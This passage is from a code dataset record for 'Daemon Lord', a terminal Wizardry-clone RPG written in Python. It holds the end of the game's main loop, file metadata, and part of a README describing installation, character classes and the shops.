if battle\n meswin.print(\"*** encounter ***\")\n vscr.disp_scrwin(floor_obj)\n getch()\n game.battle.battle()\n if party.defeated(): # party defeated\n break\n if rtn == 2 and game.battle.treasure: # room battle\n game.chest.chest()\n game.battle.gold *= 2 # Twice the gold for a chest.\n if party.defeated():\n break\n if not game.battle.treasure:\n game.battle.exp = 0\n game.battle.gold = 0\n survnum = sum(1 for m in party.members\n if m.state in [State.OK, State.ASLEEP,\n State.PARALYZED, State.STONED])\n meswin.print(f\"Each survivor gets {game.battle.exp//survnum} e.p.\",\n start=' ')\n meswin.print(f\"Each survivor gets {game.battle.gold//survnum} gold.\",\n start=' ')\n for mem in party.members:\n if mem.state == State.ASLEEP:\n mem.state = State.OK\n if mem.state in [State.OK, State.PARALYZED, State.STONED]:\n mem.exp += game.battle.exp//survnum\n mem.gold += game.battle.gold//survnum\n if game.battle.ran: # ran?\n if floor_obj != party.floor_obj:\n floor_obj = party.floor_obj\n vscr.disp_scrwin(floor_obj)\n\n exit = dungeon.check_move_floor(floor_obj)\n if exit: # Exit from dungeon\n mlist = party.members[:]\n for mem in mlist:\n if mem.poisoned:\n mem.poisoned = False\n mem.hpplus = 0\n if mem.state in [State.PARALYZED, State.STONED, State.DEAD,\n State.ASHED]:\n party.members.remove(mem)\n # Carried away in an ambulance\n game.hospitalized.append(mem)\n\n party.light_cnt = 0\n party.ac = 0\n party.silenced = False\n party.identify = False\n party.gps = False\n\n break\n if party.floor_move:\n continue\n\n c = getch(wait=True)\n draw = True\n if c:\n if c == 'c':\n camp(game, floor_obj)\n if game.party.floor_move:\n continue\n elif c in 'hH' and party.x > 0:\n if (c == 'H' and config['debug']) or \\\n floor_obj.can_move(party.x-1, party.y):\n party.move(party.x-1, party.y)\n meswin.print(\"west\")\n elif c in 'kK' and party.y > 0:\n if (c == 'K' and config['debug']) or \\\n floor_obj.can_move(party.x, party.y-1):\n party.move(party.x, party.y-1)\n meswin.print(\"north\")\n elif c in 'jJ' and party.y < floor_obj.y_size-1:\n if (c == 'J' and config['debug']) or \\\n floor_obj.can_move(party.x, party.y+1):\n party.move(party.x, party.y+1)\n meswin.print(\"south\")\n elif c in 'lL' and party.x < floor_obj.x_size-1:\n if (c == 'L' and config['debug']) or \\\n floor_obj.can_move(party.x+1, party.y):\n party.move(party.x+1, party.y)\n meswin.print(\"east\")\n elif c == 'o': # open or unlock door\n vscr.disp_scrwin(floor_obj)\n floor_obj.open_door(game, meswin)\n elif c == '*' and config['debug']:\n breakpoint()\n elif c == '.':\n meswin.print('.')\n vscr.disp_scrwin()\n elif c == '>' and config['debug']:\n party.floor_move = 1 # go down\n for m in party.members:\n m.deepest = max(m.deepest, party.floor)\n elif c == '<' and config['debug']:\n party.floor_move = 2 # go up\n elif c == 'S':\n game.save()\n meswin.print(\"saved.\")\n vscr.disp_scrwin()\n elif c == '#' and config['debug']:\n for y in range(party.y-10, party.y+10+1):\n for x in range(party.x-32, party.x+32+1):\n floor_obj.put_tile(\n x, y, floor_obj.get_tile(x, y), orig=False)\n else:\n pass # draw = False\n else:\n draw = False\n if draw:\n vscr.disp_scrwin(floor_obj)\n\n vscr.meswins = meswins_save\n vscr.cls()\n party.place = Place.EDGE_OF_TOWN\n vscr.disp_scrwin()\n\n\ndef dispatch(game):\n \"\"\"\n dispatch either to edge of town, castle or maze\n \"\"\"\n while game.party.place != Place.LEAVE_GAME:\n pl = game.party.place\n if pl == Place.EDGE_OF_TOWN:\n edge_town(game)\n elif pl == Place.CASTLE:\n castle(game)\n elif pl 
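After a battle, the maze loop above splits rewards evenly: every member still OK, asleep, paralyzed or stoned counts as a survivor, and each receives `exp // survivors` e.p. and `gold // survivors` gold — with the gold doubled first when a room battle's chest was opened. The division as a sketch (string states stand in for the `State` enum):

```python
SURVIVOR_STATES = {'OK', 'ASLEEP', 'PARALYZED', 'STONED'}

def split_rewards(exp, gold, states, chest_opened=False):
    """Per-survivor (exp, gold) after a battle, as in maze()."""
    if chest_opened:
        gold *= 2  # "Twice the gold for a chest."
    surv = sum(1 for s in states if s in SURVIVOR_STATES)
    return exp // surv, gold // surv

# Five survivors and one dead member:
print(split_rewards(1000, 730, ['OK'] * 5 + ['DEAD']))  # (200, 146)
```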
== Place.MAZE:\n maze(game)\n\n\ndef main():\n game = Game() # singleton\n party = Party(0, 0, 1)\n game.party = party\n game.load_spelldef()\n game.load_itemdef()\n game.load_monsterdef()\n party.place = Place.CASTLE\n w, h = terminal_size()\n vscr = Vscr(w, h-1) # singleton\n # vscr = Vscr(78, 24) # +++++++++++++++\n game.vscr = vscr\n vscr.game = game\n # meswin for scrollwin\n vscr.meswins.append(Meswin(vscr, 43, vscr.height-7, vscr.width-42, 7))\n # meswin for castle/edge of town\n vscr.meswins.append(Meswin(vscr, 10, vscr.height//5, vscr.width-20,\n (vscr.height-8)*2//3, frame=True))\n game.spell = Spell(game) # singleton\n game.dungeon = Dungeon(game) # singleton\n game.battle = Battle(game) # singleton\n game.chest = Chest(game) # singleton\n\n dispatch(game)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.3963751494884491, "alphanum_fraction": 0.4127925634384155, "avg_line_length": 34.86302947998047, "blob_id": "e9df5736120784b2eb4df966c04ad34444976390", "content_id": "0896c97ed945136795762cbc57d4e37ab558588c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 118590, "license_type": "permissive", "max_line_length": 313, "num_lines": 3300, "path": "/README.md", "repo_name": "Kuiteland/daemonlord", "src_encoding": "UTF-8", "text": "\n# Table of Contents\n\n1. [dl.py - Daemon Lord](#org0a10bdc)\n 1. [Overview](#org5d33148)\n 1. [Wizardry clone](#org0a71bd2)\n 2. [Rogue-like dungeon maps](#org385f9a0)\n 3. [Auto-generated maps w/o resetting levels and items of characters](#org845dba2)\n 4. [A little more user friendly than Wizardry](#org488af41)\n 2. [Important notice: alpha quality](#orga769fd8)\n 3. [Getting started](#org44a9803)\n 1. [Prerequisites](#orgccd68e3)\n 2. [Installation](#org77a855b)\n 4. [How to Play](#org8aac521)\n 1. [Tips](#org0b988dd)\n2. [Contributing](#org98494e0)\n3. [License](#orgdc1970f)\n4. [Quick Tour of Daemon Lord](#org7fbe6c3)\n 1. [Game start](#orge3aa2f7)\n 2. [Edge of Town](#orgf434b4e)\n 1. [Training Grounds](#orgb6e8b1e)\n 3. [Castle](#orgf134270)\n 1. [Hawthorne Tavern](#orgac59c49)\n 2. [Trader Jay's](#org99570fd)\n 3. [Equip](#org3c59398)\n 4. [Save and Resume](#orgd334654)\n 5. [Dungeon](#org8f46950)\n 1. [Walk around the Dungeon](#org56d6bb2)\n 2. [Battle](#org9440384)\n 3. [Chest](#orgc02a53d)\n 4. [Friendly monsters](#orgb3c2450)\n 5. [Get ouf of the Dungeon](#org8827640)\n 6. [A new dungeon!](#orgf859d65)\n 7. [Camp](#org3bdba13)\n 8. [Heal all members](#org70c73a4)\n 9. [Prep for adventure](#orge4f1380)\n 10. [Save and Resume from camp](#orgdeabb28)\n 6. [Castle](#orged946f6)\n 1. [The Lakehouse Inn](#org78054aa)\n5. [Spells](#org00dea26)\n 1. [Overview](#org37d2ec2)\n 2. [Usage](#org31faaf3)\n 3. [Mage Spells](#org502fc72)\n 4. [Priest Spells](#org5e7606d)\n6. [Monsters](#orgad97807)\n 1. [Shallow floors](#org5a27944)\n 2. [Middle depth floors](#orgde7ee28)\n 3. [Deep floors](#orgb8d9202)\n 4. [Boss and special monsters](#orge29b2ef)\n 1. [gate keeper](#org7b8b294)\n 2. [d????? ???, t?? ????, a????](#org93ed8e5)\n 3. [d????? ????](#orgf5f2654)\n 4. [S???????, N??????](#org52768ce)\n7. [Contact](#org861f339)\n8. 
[Acknowledgements](#org99eca6e)\n\n\n\n<a id=\"org0a10bdc\"></a>\n\n# dl.py - Daemon Lord\n\nDaemon Lord is a Wizardry-clone RPG with rogue-like (ie, text-based), randomly-created 2D maps.\n\n daemon lord - dl - [battle] floor: 6 ( 69/ 54) <identify> <light> ^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#...........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#...........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n #######^^^| 1) 2 tycoons (2) |^^^^^^^^^^^^^\n .....##^^^| |^^^^^^^^^^^^^\n .....##^^^| |^^^^^^^^^^^^^\n .....##^^^| |^^^^^^^^^^^^^\n .....##^^^^^^^^^^^^^^^^^^^^^^^^^^^^##.##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n .....##^^^| * andy swings violently at tycoon and hits 1 times for 6 |^^^^^^^^^^^^^\n .....##^^^| damage. |^^^^^^^^^^^^^\n ###.###^^^| * bean slashes violently at tycoon and hits 2 times for |^^^^^^^^^^^^^\n ###.###^^^| 9 damage. |^^^^^^^^^^^^^\n ^##.##^^^^| tycoon is killed. |^^^^^^^^^^^^^\n ^##.##^^^^| * ed stabs violently at tycoon and hits 1 times for 2 |^^^^^^^^^^^^^\n ^##.##^^^^| damage. |^^^^^^^^^^^^^\n ^##.##^^^^| * fun casted shunmin. |^^^^^^^^^^^^^\n ^##.##^^^^| tycoon is not slept. |^^^^^^^^^^^^^\n ^##.##^^^^| tycoon is not slept. |^^^^^^^^^^^^^\n ###.######^^^^^^^^^^^^^^##.......###...##.##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ###.######^^^^^^^^^^^^^^##...#######......##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ........##^^^^^^^^^^^^^^###.########...#####^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ........##^^^^^^^^^^^^^^###.###...##...#####^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ........##^^^^^^^^^^^^^^^##.###...###.##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ###.######^^^^^^^^^^^^^^^##...........##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ###.######^^^^^^^^^^^^^^^######...######^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^##.##^^^^^^^^^^^^^^^^^^^###############^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^##.##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^* north ^\n 1 andy G-FIG -2 63 fight ^ Which direction? - ;)leave > k ^\n 2 bean G-FIG -3 70 fight ^* Opened. ^\n 3 cammy G-FIG -2 77 fight ^* north ^\n 4 dexie N-THI 8 53 fight ^* saved. 
^\n 5 ed G-PRI 8 67 fight ^* north ^\n 6 fun G-MAG 8 35 shunmin ^* *** encounter *** ^\n\n\n<a id=\"org5d33148\"></a>\n\n## Overview\n\n\n<a id=\"org0a71bd2\"></a>\n\n### Wizardry clone\n\n- Based on Wizardry I; Proving Grounds of the Mad Overlord\n- Party of up to six members\n- Battles with monster parties in the dungeon\n- Gain experience points and level up\n- Get gold and powerful items from trap-protected chests\n- Roughly 50 magic spells, 100 items and 100 monsters (for now)\n- Need to type spells and chest traps accurately\n\n\n<a id=\"org385f9a0\"></a>\n\n### Rogue-like dungeon maps\n\n- Text-based, 2D dungeon maps\n- Move with `h, j, k, l` keys\n- 10 (or more) layers deep\n- Maps are auto-generated.\n\n\n<a id=\"org845dba2\"></a>\n\n### Auto-generated maps w/o resetting levels and items of characters\n\n- Every time you go down the dungeon, you will see different maps\n- No elevator but you have 'tsubasa' (mage level 2) spell.\n- 'tsubasa' allows you to teleport to the deepest floor the caster has visited\n - You will be landed on the upstairs of the floor\n - You still need to look for the downstairs which should be far away from where you land\n- You can restart your adventure from a floor that should match your character levels\n\n\n<a id=\"org488af41\"></a>\n\n### A little more user friendly than Wizardry\n\n- Re-calculate the bonus value with `.` key when creating a character\n- Age doesn't matter anymore\n- Save and resume anywhere in the dungeon, preserving floor maps and spells in effect such as identification of monsters or protection\n- Poison effect stops at HP = 1\n- You don't have to pool gold anymore. You can pay as a party.\n- Group heal spells for the entire party\n\n\n<a id=\"orga769fd8\"></a>\n\n## Important notice: alpha quality\n\nCurrently, DL (daemon lord) is under development and it's in an alpha code quality. Probably there are still many bugs, some of them might be critical.\n\nPlease file issues on github, or send bug reports (or comments) to achiwa912+gmail.com (replace '+' with '@').\n\n\n<a id=\"org44a9803\"></a>\n\n## Getting started\n\n\n<a id=\"orgccd68e3\"></a>\n\n### Prerequisites\n\n- macOS, Linux (or Windows)\n - Developed on macOS BigSur and Fedora 32\n - It might run on Windows but not tested\n- Python 3.8 or later (it uses the \"walrus\" assignment expression)\n- Terminal of 78x24 or larger\n- dl.py - the program\n- monsters.csv - monster data file\n- spells.csv - spell data file\n- items.csv - item data file\n\n\n<a id=\"org77a855b\"></a>\n\n### Installation\n\n1. Setup python 3.8 or later\n2. Place dl.py, monsters.csv, spells.csv, items.csv in the same directory\n3. Run \"python dl.py\"\n\n\n<a id=\"org8aac521\"></a>\n\n## How to Play\n\n1. Create and register characters at Training Grounds\n2. Form a party at Hawthorne Tavern\n3. Purchase weapons and armors at Trader Jay's\n4. Equip weaspns and armors at Hawthorne's Tavern\n5. Go in to the dungeon\n6. Battles with monsters\n7. Go back to the Edge of Town / Castle\n8. 
Get some rest at the Lakehouse Inn (you might level up)\n\nYou can save either at Edge of Town or from the Camp menu.\nYou can perform resume operation only from Edge of Town.\n\n\n<a id=\"org0b988dd\"></a>\n\n### Tips\n\n- Have the spell and monster lists (see below) near you\n- Try unlocking (an locked door) or disarming (a chest) until you succeed\n- Run away from strong (or annoying) monsters\n- Save regularly\n- ctrl-c is disabled but you can Q)uit game on a prompt (press 'Q' (shift-q))\n\n\n<a id=\"org98494e0\"></a>\n\n# Contributing\n\nAny contributions you make are greatly appreciated.\n\n1. Fork the Project\n2. Create your Feature Branch (git checkout -b feature/AmazingFeature)\n3. Commit your Changes (git commit -m 'Add some AmazingFeature')\n4. Push to the Branch (git push origin feature/AmazingFeature)\n5. Open a Pull Request\n\n\n<a id=\"orgdc1970f\"></a>\n\n# License\n\nDaemon Lord is under [MIT license](https://en.wikipedia.org/wiki/MIT_License).\n\n\n<a id=\"org7fbe6c3\"></a>\n\n# Quick Tour of Daemon Lord\n\n\n<a id=\"orge3aa2f7\"></a>\n\n## Game start\n\nDL (Daemon Lord) starts with the screen below at the Castle.\n\n daemon lord - dl - [castle] floor:?? (???/???) \n \n \n \n \t | * *** Castle *** | \n \t | h)awthorne tavern | \n \t | t)rader jay's | \n \t | i)lakehouse inn | \n \t | m)oss general hospital | \n \t | e)dge of town | \n \t | Command? > | \n \t | | \n \t | | \n \t | | \n \n \n \n # name class ac hp status \n 1 \n 2 \n 3 \n 4 \n 5 \n 6\n\nWhen you first start the game, you need to go to Edge of Town (press `e`) > Training Grounds (press `t`), and then create characters (press `c`).\n\n\n<a id=\"orgf434b4e\"></a>\n\n## Edge of Town\n\n\n<a id=\"orgb6e8b1e\"></a>\n\n### Training Grounds\n\nAt Training Grounds, you can create or inspect characters. You create one character at a time.\n\n daemon lord - dl - [training_grounds] floor:?? (???/???) \n \n \n \n \t | S)ave and quit game | \n \t | R)esume from saved data | \n \t | Command? > t | \n \t | * *** training grounds *** | \n \t | c)reate a character | \n \t | i)nspect a character | \n \t | l)eave | \n \t | Command? > c | \n \t | * Enter new name | \n \t | > | \n \n \n \n # name class ac hp status \n 1 \n 2 \n 3 \n 4 \n 5 \n 6 \n\nTo create a character, input its name, choose race (human, elf, dwarf, gnome, hobbit) and alignment (good, neutral, evil). Race determines base attribute values as in Wizardry. 
For example, human's base strength is 8.\n\nHere's base attribute table:\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-right\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">race</th>\n<th scope=\"col\" class=\"org-right\">str</th>\n<th scope=\"col\" class=\"org-right\">i.q.</th>\n<th scope=\"col\" class=\"org-right\">pie</th>\n<th scope=\"col\" class=\"org-right\">vit</th>\n<th scope=\"col\" class=\"org-right\">agi</th>\n<th scope=\"col\" class=\"org-right\">luk</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">human</td>\n<td class=\"org-right\">8</td>\n<td class=\"org-right\">8</td>\n<td class=\"org-right\">5</td>\n<td class=\"org-right\">8</td>\n<td class=\"org-right\">8</td>\n<td class=\"org-right\">9</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">elf</td>\n<td class=\"org-right\">7</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">6</td>\n<td class=\"org-right\">9</td>\n<td class=\"org-right\">6</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">dwarf</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">7</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">5</td>\n<td class=\"org-right\">6</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">gnome</td>\n<td class=\"org-right\">7</td>\n<td class=\"org-right\">7</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">8</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">7</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">hobbit</td>\n<td class=\"org-right\">5</td>\n<td class=\"org-right\">7</td>\n<td class=\"org-right\">7</td>\n<td class=\"org-right\">6</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">15</td>\n</tr>\n</tbody>\n</table>\n\n | Command? > c | \n | * Enter new name | \n | > Adrien | \n | Choose race - h)uman e)lf d)warf g)nome o)hobbit > | \n | d | \n | * dwarf | \n | Choose alignment - g)ood n)eutral e)vil > g | \n | * Alignment: good | \n\nThen you will distribute assigned bonus points to attributes.\nMove the cursor `>` with `j, k` keys and decrease (`h`) or increase (`l`) the attribute value. When bonus value reaches zero, you can choose a class by pressing `x`. The maximum attribute values here is 18 (but subject to change).\n\nTip: If you don't like the bonus point assigned, you can recalculate one with `.` key. You might want to recalculate bonus until you get 16 or higher.\n\nEligible classes are listed at the bottom of the window. To choose a class, type the first letter of a class. For example, `f` for fighter, `m` for mage, etc.\n\nClasses have attribute requirements and in some cases alignment requirements as in Wizardry. For example, fighter requires strength>=11. 
Theif requires agility>=11 as well as alignment must be either neutral or evil.\n\nClass requirement table:\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">class</th>\n<th scope=\"col\" class=\"org-left\">str</th>\n<th scope=\"col\" class=\"org-right\">i.q.</th>\n<th scope=\"col\" class=\"org-right\">pie</th>\n<th scope=\"col\" class=\"org-left\">vit</th>\n<th scope=\"col\" class=\"org-left\">agi</th>\n<th scope=\"col\" class=\"org-left\">luk</th>\n<th scope=\"col\" class=\"org-left\">good</th>\n<th scope=\"col\" class=\"org-left\">neutral</th>\n<th scope=\"col\" class=\"org-left\">evil</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">fighter</td>\n<td class=\"org-left\">11</td>\n<td class=\"org-right\">-</td>\n<td class=\"org-right\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">ok</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">mage</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-right\">11</td>\n<td class=\"org-right\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">ok</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-right\">-</td>\n<td class=\"org-right\">11</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">thief</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-right\">-</td>\n<td class=\"org-right\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">11</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">ok</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">bishop</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-right\">12</td>\n<td class=\"org-right\">12</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">samurai</td>\n<td class=\"org-left\">15</td>\n<td class=\"org-right\">11</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-left\">14</td>\n<td class=\"org-left\">10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">-</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ninja</td>\n<td class=\"org-left\">15</td>\n<td class=\"org-right\">17</td>\n<td class=\"org-right\">15</td>\n<td class=\"org-left\">16</td>\n<td class=\"org-left\">15</td>\n<td class=\"org-left\">16</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lord</td>\n<td class=\"org-left\">15</td>\n<td class=\"org-right\">12</td>\n<td 
class=\"org-right\">12</td>\n<td class=\"org-left\">15</td>\n<td class=\"org-left\">14</td>\n<td class=\"org-left\">15</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n</tr>\n</tbody>\n</table>\n\n daemon lord - dl - [training_grounds] floor:?? (???/???) \n \n \t | * Distribute bonus points - | \n \t | h)minus j)down k)up l)plus | \n \t | *| .)change bonus x)done | \n \t | >| | \n \t | | strength 18 | \n \t | | iq 13 | \n \t | *| piety 14 | \n \t | | vitality 10 | \n \t | *| agility > 6 | \n \t | *| luck 6 | \n \t | >| | \n \t | *| bonus 0 | \n \t | | \n \t | fighter mage priest bishop | \n \t | Choose class (f/m/p/b) > | \n\nA recommended party consists of three fighters, a thief, a priest and a mage. You should create six characters before going into the dungeon. Tip: You should have one thief in your party. Without one, you might not be able to unlock doors in the dungeon.\n\nTo view created charactes, type `i` at the Training Grounds menu.\n\n | * *** training grounds *** | \n | c)reate a character | \n | i)nspect a character | \n | l)eave | \n | Command? > |\n\nYou can move cursor with `j, k` key and type `i` to view the character.\n\n | * Inspect characters | \n | * - j)down k)up i)nspect d)elete l)eave | \n | >1 ab Lv 1 dwa-g-fig | \n | 2 ben Lv 1 hum-g-fig |\n\nAlso, you can `d)elete` the character from here. Deleted characters are lost forever and you can't undo a delete operation.\n\n daemon lord - dl - [training_grounds] floor:?? (???/???) \n \n \t | ab L 1 g-fig dwarf | \n \t | | \n \t | strength 18 gold 102 lvl 1 | \n \t | i.q. 7 e.p. 0 rip 0 | \n \t | piety 10 next 1000 a.c. 10 | \n \t | vitality 13 marks 0 | \n \t | agility 11 h.p. 13/ 13 | \n \t | luck 8 status OK | \n \t | | \n \t | mage 0/0/0/0/0/0/0 priest 0/0/0/0/0/0/0/ | \n \t | 1) 2) | \n \t | 3) 4) | \n \t | 5) 6) | \n \t | 7) 8) | \n \t | | \n # name | i)tems s)pells jk)change member l)leave > |\n\nAs you have already noticed, DL gives you a guide of which letter you can type when it prompts input from you. For example, \"i)tem s)pells ..\" means you can type `i` or `s`.\n\nHave you created six characters? Then, you should go to Castle > Hawthorne Tavern to form a party. Type `l` to leave the Training Grounds and then type `c` to go to Castle.\n\n\n<a id=\"orgf134270\"></a>\n\n## Castle\n\n | * *** Castle *** | \n | h)awthorne tavern | \n | t)rader jay's | \n | i)lakehouse inn | \n | m)oss general hospital | \n | e)dge of town | \n | Command? > |\n\nFrom the Castle menu, you can visit several places, but you want to go to Hawthorne Tavern now so type `h`.\n\n\n<a id=\"orgac59c49\"></a>\n\n### Hawthorne Tavern\n\n | * *** The Hawthorne Tavern *** | \n | Command? - a)dd r)emove i)nspect d)ivvy gold l)eave > |\n\nAt the Tavern, you can add, remove or inspect characters. Also, you can equally divide gold among party members. As you want to form a party, type `a` to add members to the party.\n\nUse `j, k` keys to choose members and `x` to add.\n\n | * | Add who to the party? 
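The class requirement table earlier reads as a set of attribute minimums plus an allowed-alignment set, which is straightforward to encode and check. A sketch (the dict layout is mine; the thresholds are from the table), reproducing the "fighter mage priest bishop" line from the creation screen above:

```python
# (str, iq, pie, vit, agi, luk) minimums and allowed alignments
CLASS_REQS = {
    'fighter': ((11, 0, 0, 0, 0, 0), {'good', 'neutral', 'evil'}),
    'mage':    ((0, 11, 0, 0, 0, 0), {'good', 'neutral', 'evil'}),
    'priest':  ((0, 0, 11, 0, 0, 0), {'good', 'evil'}),
    'thief':   ((0, 0, 0, 0, 11, 0), {'neutral', 'evil'}),
    'bishop':  ((0, 12, 12, 0, 0, 0), {'good', 'evil'}),
    'samurai': ((15, 11, 10, 14, 10, 0), {'good', 'neutral'}),
    'ninja':   ((15, 17, 15, 16, 15, 16), {'evil'}),
    'lord':    ((15, 12, 12, 15, 14, 15), {'good'}),
}

def eligible(stats, align):
    """Classes a (str, iq, pie, vit, agi, luk) tuple qualifies for."""
    return [cls for cls, (mins, aligns) in CLASS_REQS.items()
            if align in aligns and all(s >= m for s, m in zip(stats, mins))]

print(eligible((18, 13, 14, 10, 6, 6), 'good'))
# ['fighter', 'mage', 'priest', 'bishop']
```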
| | \n | | - j)down k)up x)choose l)eave |gold l)eave > a | \n | | > 1 ab Lv 1 DWA-G-FIG | | \n | | 2 ben Lv 1 HUM-G-FIG | | \n | | 3 cam Lv 1 DWA-G-FIG | | \n | | 4 dia Lv 1 HOB-N-THI | | \n | | 5 emily Lv 1 GNO-G-PRI | | \n | | 6 faun Lv 1 ELF-G-MAG | |\n\nHere, you can just type `x` for six times to add the six members to the party.\nNow, they are shown in the party window at the bottom left of the screen.\n\n # name class ac hp status \n 1 ab G-FIG 10 13 OK \n 2 ben G-FIG 10 12 OK \n 3 cam G-FIG 10 10 OK \n 4 dia N-THI 10 7 OK \n 5 emily G-PRI 10 13 OK \n 6 faun G-MAG 10 7 OK\n\n\n<a id=\"org99570fd\"></a>\n\n### Trader Jay's\n\nBefore heading straight to the dungeon, we need to purchase weapons and armors, and equip them. So, let's go to Castle > Trader Jay's for some shopping.\n\nEach character is given between 100 and 200 gold upon creation. You can expect a party with six members would have roughly 900 gold in total.\n\nAt Trader Jay's, you'll be asked who in the party to enter the store. Specify the number of a member in the party. You can buy, sell, uncurse, identify items. You can also pool gold here. Choose `b)uy` for shopping.\n\n | * *** Trader Jay's *** | \n | Who? - # or l)eave > 1 | \n | * Welcome, ab. | \n | * You have 102 gold. | \n | b)uy s)ell u)ncurse i)dentify p)ool gold l)eave > | \n\nAnother window opens for items they sell. This is the weapon list page. Use `j, k` keys to move the cursor (`>`). Let's type `x` and buy a long sword for Ab.\n\n daemon lord - dl - [trader_jays] floor:?? (???/???) \n \t | ab has 102 gold | \n \t | jk)cursor x)choose hl)page ;)leave | \n \t | > 1 long sword 25 $ | \n \t | | 2 sling 150 | | \n \t | | 3 mage's bow 1200 | | \n \t | | 4 bow 1500 | | \n \t | | 5 holy bow 8000# | | \n \t | | 6 short sword 15 $ | | \n \t | | 7 short sword +1 15000 | | \n \t | | 8 mace 30 $ | | \n \t | | 9 anointed flail 150 | | \n \t | | 10 wand 10 $ |)eave > |\n\nTo change item categories, use `h, l` keys. Below is the armor list page. Let's buy a chain mail for him.\n\n daemon lord - dl - [trader_jays] floor:?? (???/???) \n \t | Sorry, you can't afford it. | \n \t | Will someone else pay? (y/n)> | \n \t | 1 robe 15 $ | \n \t | | 2 leather armor 50 $ | | \n \t | | 3 leather +1 1500 | | \n \t | | > 4 chain mail 90 | | \n \t | | 5 chain +1 1500 | | \n \t | | 6 breast plate 200 | | \n \t | | 7 breast +1 1500 | | \n \t | | 8 plate mail 750 | | \n \t | | 9 plate +1 1500 | | \n\nOops, he doesn't have the money. But, no worries, you can pay as the party. Type `y` to the question \"Will someone else pay? (y/n)\". This way, you don't have to pool gold first to the current shopper anymore.\n\nTip: Recommended shopping list:\n\n- fighter - long sword, chain mail, large shield\n- thief - sling\n- priest - sling (if you can still afford it)\n- mage - 